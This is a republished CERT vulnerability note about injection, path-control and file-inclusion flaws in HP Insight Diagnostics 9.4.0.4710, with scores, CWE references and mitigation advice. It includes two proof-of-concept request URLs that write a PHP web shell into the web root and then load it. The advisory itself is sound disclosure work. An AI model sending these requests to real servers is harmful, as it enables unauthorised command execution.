Executive Summary

Summary
Title HP Insight Diagnostics 9.4.0.4710 multiple vulnerabilities
Informations
Name VU#324668 First vendor Publication 2013-06-10
Vendor VU-CERT Last vendor Modification 2013-06-10
Severity (Vendor) N/A Revision M

Security-Database Scoring CVSS v3

Cvss vector : N/A
Overall CVSS Score NA
Base Score NA Environmental Score NA
impact SubScore NA Temporal Score NA
Exploitabality Sub Score NA
 
Calculate full CVSS 3.0 Vectors scores

Security-Database Scoring CVSS v2

Cvss vector : (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cvss Base Score 10 Attack Range Network
Cvss Impact Score 10 Attack Complexity Low
Cvss Expoit Score 10 Authentication None Required
Calculate full CVSS 2.0 Vectors scores

Detail

Vulnerability Note VU#324668

HP Insight Diagnostics 9.4.0.4710 multiple vulnerabilities

Original Release date: 10 Jun 2013 | Last revised: 10 Jun 2013

Overview

HP Insight Diagnostics 9.4.0.4710 and possibly earlier versions contains multiple vulnerabilities.

Description

It has been reported that HP Insight Diagnostics 9.4.0.4710 and possibly earlier versions contains multiple vulnerabilities that can be exploited by a remote attacker to execute arbitrary PHP code thus arbitrary commands with administrative privileges.

CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') - CVE-2013-3573
CWE-73: External Control of File Name or Path - CVE-2013-3574
HP Insight Diagnostics contains two vulnerabilities which allows an attacker to inject arbitrary data into a file that is stored at an arbitrary location on the server via the "devicePath" parameter (formerly "mount" in later versions).
https://<host>:2381/hpdiags/frontend2/commands/saveCompareConfig.php?filename=comparesurvey&target=winhardrive&device=&devicePath=C:/hp/hpsmh/data/htdocs/hpdiags/frontend2/help/&category=all&advanced=yes&leftFile=surveybase.xml&leftFileName=<%3f=shell_exec($_REQUEST[0])%3b%3f>&rightFile=survey.lastwebsession.xml&rightFileName=-&changesOnly=yes&overwrite=yes

CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program - CVE-2013-3575
HP Insight Diagnostics contains a local file inclusion vulnerability that is limited to ".html" inside the "<document-root>/hpdiags/frontend2/help/" directory.
https://<host>:2381/hpdiags/frontend2/help/pageview.php?path=comparesurvey.html

Impact

By combining these vulnerabilities, an authenticated remote attacker may be able to execute arbitrary commands on the server with administrator privileges.

Solution

We are currently unaware of a practical solution to this problem.

Restrict Network Access

As a general good security practice, only allow connections from trusted hosts and networks. Restricting access would prevent an attacker from connecting to the service from a blocked network location.

Vendor Information (Learn More)

VendorStatusDate NotifiedDate Updated
Hewlett-Packard CompanyAffected05 Apr 201306 Jun 2013
If you are a vendor and your product is affected, let us know.

CVSS Metrics (Learn More)

GroupScoreVector
Base7.4AV:A/AC:M/Au:S/C:C/I:C/A:C
Temporal5.7E:U/RL:U/RC:UC
Environmental5.2CDP:LM/TD:M/CR:ND/IR:ND/AR:ND

References

  • http://cwe.mitre.org/data/definitions/73.html
  • http://cwe.mitre.org/data/definitions/74.html
  • http://cwe.mitre.org/data/definitions/98.html
  • http://www.hp.com/servers/diags
  • http://bizsupport2.austin.hp.com/bc/docs/support/SupportManual/c03652816/c03652816.pdf

Credit

Thanks to Markus Wulftange from Daimler TSS for reporting this vulnerability.

This document was written by Michael Orlando.

Other Information

  • CVE IDs:CVE-2013-3573CVE-2013-3574CVE-2013-3575
  • Date Public:10 Jun 2013
  • Date First Published:10 Jun 2013
  • Date Last Updated:10 Jun 2013
  • Document Revision:13

Feedback

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Original Source

Url : http://www.kb.cert.org/vuls/id/324668

CWE : Common Weakness Enumeration

% Id Name
100 % CWE-20 Improper Input Validation

CPE : Common Platform Enumeration

TypeDescriptionCount
Application 1

Alert History

If you want to see full details history, please login or register.
0
1
Date Informations
2013-06-14 17:21:05
  • Multiple Updates
2013-06-10 17:19:47
  • First insertion